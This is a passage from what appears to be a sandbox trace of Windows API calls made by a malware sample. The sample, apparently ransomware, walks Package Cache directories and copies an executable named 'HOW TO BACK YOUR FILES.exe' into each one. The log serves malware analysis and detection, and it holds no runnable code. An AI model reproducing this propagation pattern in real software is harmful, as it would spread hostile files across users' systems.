(lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.498] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64" [0090.498] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64" [0090.498] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.498] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.499] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.499] GetLastError () returned 0x0 [0090.499] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.499] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.499] CloseHandle (hObject=0x120) returned 1 [0090.499] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.499] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x62e17880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x62e17880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.499] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.499] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.500] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" [0090.500] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" [0090.500] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.500] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.500] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.501] GetLastError () returned 0x0 [0090.501] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.501] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.501] CloseHandle (hObject=0x120) returned 1 [0090.501] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.501] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecd0b340, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x62e89ca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x62e89ca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.501] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.501] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.501] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" [0090.501] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005" [0090.501] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.501] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.502] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.502] GetLastError () returned 0x0 [0090.502] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.502] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.502] CloseHandle (hObject=0x120) returned 1 [0090.503] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.503] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb49460, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c27d800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c27d800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.503] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.503] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.503] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" [0090.503] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages" [0090.503] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.503] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.504] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.504] GetLastError () returned 0x0 [0090.504] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.504] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.504] CloseHandle (hObject=0x120) returned 1 [0090.504] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.504] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x4c27d800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c27d800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.504] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.504] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.504] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" [0090.505] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" [0090.505] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.505] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.505] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.505] GetLastError () returned 0x0 [0090.506] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.506] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.506] CloseHandle (hObject=0x120) returned 1 [0090.506] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.506] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x62fba7a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x62fba7a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.506] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.506] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.506] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D" [0090.506] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D" [0090.506] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.506] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.507] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.507] GetLastError () returned 0x0 [0090.507] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.507] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.507] CloseHandle (hObject=0x120) returned 1 [0090.507] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.507] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa938e870, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.508] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.508] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.508] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages" [0090.508] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages" [0090.508] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.508] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.508] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.509] GetLastError () returned 0x0 [0090.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.509] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.509] CloseHandle (hObject=0x120) returned 1 [0090.509] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.509] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.509] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.509] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.509] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch" [0090.509] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch" [0090.510] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.510] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.510] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.510] GetLastError () returned 0x0 [0090.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.510] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.510] CloseHandle (hObject=0x120) returned 1 [0090.511] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.511] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.511] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.511] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.511] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Package 